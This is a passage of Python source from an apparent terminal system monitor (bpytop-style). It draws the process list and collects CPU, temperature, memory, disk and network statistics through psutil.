out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = THEME.inactive_fg
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
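#* Keep a small per-pid cpu graph while usage is relevant; it is dropped when usage stays below 1% for 10 updates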
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
if cls.selected > cy: calc = cls.selected - cy
elif cls.selected > 0 and cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "mouse_scroll_up" in Key.mouse:
del Key.mouse["mouse_scroll_up"], Key.mouse["mouse_scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
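#* Work through the queue: run each collector's _collect() (skipped when only drawing) followed by its _draw()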
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
else:
cls.collect_queue = list(cls.__subclasses__())
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], text=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", text=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = True if cls.sensor_method else False
@classmethod
def _collect(cls):
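'''Collect total and per-core usage, frequency, load average, uptime and temperatures if enabled'''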
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
else:
pass
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int
cores: List[int] = []
cpu_type: str = ""
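#* With psutil, Package/Tdie readings are used as the cpu total and Core/Tccd/CPU entries as per-core temps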
if cls.sensor_method == "psutil":
try:
for name, entries in psutil.sensors_temperatures().items():
for entry in entries:
if entry.label.startswith(("Package", "Tdie")) and hasattr(entry, "current") and round(entry.current) > 0:
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
if not cls.cpu_temp_high:
if hasattr(entry, "high") and entry.high: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if hasattr(entry, "critical") and entry.critical: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high:
if hasattr(entry, "high") and entry.high: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if hasattr(entry, "critical") and entry.critical: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if len(cores) < THREADS:
if cpu_type == "intel" or (cpu_type == "other" and len(cores) == THREADS // 2):
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
elif cpu_type == "ryzen" or cpu_type == "other":
cls.cpu_temp[0].append(temp)
if len(cores) < 1: cores.append(temp)
z = 1
for t in cores:
try:
for i in range(THREADS // len(cores)):
cls.cpu_temp[z + i].append(t)
z += i
except IndexError:
break
if cls.cpu_temp[0]:
for n in range(1, len(cls.cpu_temp)):
if len(cls.cpu_temp[n]) != len(cls.cpu_temp[n-1]):
cls.cpu_temp[n] = cls.cpu_temp[n//2].copy()
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
#CONFIG.check_temp = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], text=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", text=True).split()]
if len(cores) < THREADS:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", text=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], text=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
for n in range(THREADS + 1):
cls.cpu_temp[n].append(temp)
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
excludes: List[str] = ["squashfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
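#* Per-device io counters are only requested on Linux; other systems use the aggregate counters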
try:
io_counters = psutil.disk_io_counters(perdisk=True if SYSTEM == "Linux" else False, nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
for disk in psutil.disk_partitions():
disk_io = None
io_string = ""
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
while disk_name in disk_list: disk_name += "_"
disk_list += [disk_name]
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk_name.endswith(filtering)) or (filter_exclude and disk_name.endswith(filtering))):
continue
#elif filtering and disk_name.endswith(filtering)
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
continue
u_percent = round(disk_u.percent)
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM == "Linux":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if dev_name.startswith("md"):
try:
dev_name = dev_name[:dev_name.index("p")]
except:
pass
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp))
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp))
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if MemBox.disks_width > 30:
if disk_read > 0:
io_string += f'▲{floating_humanizer(disk_read, short=True)} '
if disk_write > 0:
io_string += f'▼{floating_humanizer(disk_write, short=True)}'
elif disk_read + disk_write > 0:
io_string += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string
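#* Optionally list swap as a pseudo-disk, reordered to sit right after the first (root) entry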
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if disk_list != cls.old_disks:
MemBox.redraw = True
cls.old_disks = disk_list.copy()
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[network device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_lower] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
sync_top: int = 0
sync_string: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
@classmethod
def switch(cls, key: str):
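'''Switch to the next ("n") or previous ("b") interface in the throughput-sorted nic list'''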
if len(cls.nics) < 2: return
cls.nic_i += +1 if key == "n" else -1
if cls.nic_i >= len(cls.nics): cls.nic_i = 0
elif cls.nic_i < 0: cls.nic_i = len(cls.nics) - 1
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat or not up_stat[cls.nic].isup:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
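#* Auto-scale the graph ceiling: raised after 5 samples above the current top, lowered after 5 samples below a tenth of it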
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
